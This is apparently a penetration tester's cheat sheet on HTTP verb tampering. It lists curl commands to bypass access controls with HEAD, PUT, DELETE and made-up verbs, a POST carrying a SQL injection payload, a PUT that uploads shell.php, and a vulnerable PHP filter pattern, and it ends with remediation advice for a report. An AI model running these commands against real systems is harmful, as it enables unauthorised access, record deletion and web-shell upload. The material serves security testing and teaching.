π‘οΈ Methodology Checklist
- Identify restricted endpoints (403 or auth-required responses)
- Try alternate HTTP methods: GET β HEAD, POST, PUT, DELETE, OPTIONS
- Test TRACE for XST (Cross-Site Tracing)
- Override method header:
X-HTTP-Method-Override: PUT - Identify methods allowed:
curl -X OPTIONS http://[TARGET]/endpoint - Attempt to bypass auth by changing method to one not covered by ACL
- Document any method that returns different/elevated-access response
π― Operational Context
Use when: Web application restricts access to certain paths β try alternate HTTP methods (PUT, DELETE, HEAD, OPTIONS, TRACE) to bypass GET/POST-only restrictions.
Think Dumber First: curl -X OPTIONS http://[TARGET]/admin/ reveals allowed methods. curl -X PUT http://[TARGET]/admin/file.php bypasses authorization checks that only evaluate GET/POST.
Skip when: Server returns 405 for all methods except GET/POST β application properly restricts methods.
β‘ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
curl -i -X OPTIONS http://[TARGET_IP]/admin/ | Enumerate allowed HTTP methods via Allow header |
curl -i -X HEAD http://[TARGET_IP]/admin/reset.php | Auth bypass: HEAD executes backend logic without returning body |
curl -i -X POST -d "code=1' OR 1=1--" http://[TARGET_IP]/page.php | Filter evasion: POST bypasses GET-only sanitization |
| Burp β right-click request β Change Request Method | Toggle GETβPOST instantly in Burp |
curl -i -X HACK http://[TARGET_IP]/page.php | Fabricated verb β bypasses filters checking only GET/POST |
curl -i -X PUT -d @shell.php http://[TARGET_IP]/upload/ | PUT for arbitrary file write if allowed |
π¬ Deep Dive & Workflow
Two Root Causes
| Root Cause | Example | Bypass Method |
|---|---|---|
| Insecure server config | <Limit GET POST> only locks those verbs | Send HEAD, OPTIONS, PUT, or any other verb |
| Insecure coding | Filter checks $_GET but query uses $_REQUEST | Switch GETβPOST β filter sees empty $_GET, $_REQUEST gets POST body |
Auth Bypass Flow (Server Misconfiguration)
1. Hit protected URL β 401 or 403
2. OPTIONS request β note Allow header
3. Burp Repeater β Change Request Method to HEAD
4. Forward β response body empty (HEAD never returns body)
5. Check app state β backend script still executed
(e.g., files deleted, passwords reset)
Critical: HEAD returns 200 OK with no body on success β verify via side-effects in the app, not via response content.
Filter Evasion Flow (Insecure Coding)
// Vulnerable pattern:
if (preg_match($pattern, $_GET["code"])) { // filter checks GET
$query = "... WHERE code = '" . $_REQUEST["code"] . "'"; // executes REQUEST
}1. Payload blocked via GET β "Malicious Request Denied"
2. Burp: Change Request Method β POST
3. Parameters auto-move to body; $_GET["code"] = empty β passes filter
4. $_REQUEST["code"] = POST payload β executes injection
When HEAD Fails β Next Steps
1. Try all verbs from Allow header: PUT, DELETE, PATCH
2. Try fabricated verbs: HACK, TEST, CUSTOM
3. If payload fails after bypass β isolate: bypass β vulnerability, verify payload correct for target OS
4. URL-encode special chars in GET payloads (Burp handles automatically on Change Method)
API Verb Tampering
If GET /api/v1/user/1 is read-only:
PUT /api/v1/user/1with JSON body β overwrite recordDELETE /api/v1/user/1β delete account- APIs frequently forget to restrict non-GET methods
π οΈ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| OPTIONS returns empty or 405 | Server hides method list | Try each: curl -X HEAD, curl -X PUT, curl -X DELETE directly β 200/204 = method allowed |
| PUT upload fails | No write permission or path wrong | Try PUT to existing file path discovered via enumeration; check if /uploads/ is writable |
| TRACE method enabled | XST possible | TRACE is a reporting finding; extract any headers reflected including cookies |
| DELETE bypasses auth but returns 404 | Resource doesnβt exist | DELETE returning 404 (not 405/403) confirms method is processed β find valid resource to delete |
| Auth bypass works in Burp but not curl | Cookie/session not carried | Copy full cookie header from Burp request into curl: -H 'Cookie: session=...' |
π Reporting Trigger
Finding Title: HTTP Verb Tampering Bypasses Access Controls Impact: Inadequate HTTP method restrictions allow unauthorized access to protected endpoints and file upload/modification capabilities via non-standard verbs (PUT, DELETE), bypassing role-based access controls implemented only for GET/POST methods. Root Cause: Access control logic conditionally evaluates HTTP method rather than enforcing deny-by-default. Server misconfiguration allows unexpected HTTP methods on restricted paths. Recommendation: Implement deny-by-default for all HTTP methods on restricted endpoints. Explicitly configure allowed methods at the web server level. Disable TRACE and TRACK methods. Test access controls for all HTTP verbs, not just GET/POST.